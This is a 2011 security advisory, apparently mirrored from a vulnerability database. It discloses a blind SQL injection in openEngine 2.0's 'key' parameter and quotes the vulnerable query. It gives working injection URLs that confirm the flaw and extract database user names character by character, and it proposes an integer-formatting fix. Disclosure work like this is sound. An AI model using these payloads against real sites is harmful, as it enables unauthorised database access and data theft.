Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27208
HistoryOct 24, 2011 - 12:00 a.m.

openEngine 2.0 'key' Blind SQL Injection vulnerability

2011-10-2400:00:00
vulners.com
14

Advisory: openEngine 2.0 'key' Blind SQL Injection vulnerability
Advisory ID: SSCHADV2011-026
Author: Stefan Schurtz
Affected Software: Successfully tested on openEngine 2.0 100226
Vendor URL: http://www.openengine.de/
Vendor Status: informed
CVE-ID: -

==========================
Vulnerability Description

The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection

==================
Technical Details

vul code in 'openengine/cms/system/02_page/includes/admin.php'

$query = "SELECT * FROM ".$db_praefix."page WHERE (page_key = $page_key) AND (page_status <= ".$account_status.") $access";

==================
Exploit

Database information

User: easy

Blind SQL Injection

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie m?chten die Seite versenden."
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie m?chten die Seite Homepage (de) versenden."

User-Guessing

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121

=========
Solution

$query = sprintf("SELECT * FROM ".$db_praefix."page WHERE (page_key = %d) AND (page_status <= ".$account_status.") $access;",$page_key);

====================
Disclosure Timeline

08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory

========
Credits

Vulnerability found and advisory written by Stefan Schurtz.

===========
References

http://www.openengine.de/
http://www.rul3z.de/advisories/SSCHADV2011-026.txt
http://www.rul3z.de/advisories/SSCHADV2011-019.txt